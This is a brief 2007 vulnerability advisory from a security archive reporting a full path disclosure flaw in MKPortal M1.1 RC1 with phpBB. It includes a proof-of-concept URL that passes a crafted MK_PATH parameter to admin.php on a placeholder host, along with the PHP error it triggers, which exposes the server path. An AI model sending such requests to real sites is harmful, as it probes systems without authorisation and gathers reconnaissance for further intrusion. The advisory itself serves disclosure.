MKPortal Full Path Disclosure

2007-01-09T00:00:00
ID SECURITYVULNS:DOC:15639
Type securityvulns
Reporter Securityvulns
Modified 2007-01-09T00:00:00

Description

MkPortal Full Path Disclosure

Vulnerability discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it

Tested on MKPortal M1.1 RC1 with PhpBB other versions may also be affected.

http://www.victim.com/mkportal/admin.php?MK_PATH=1

Warning: main(mkportal/include/mk_mySQL.php): failed to open stream: No such file or directory in D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24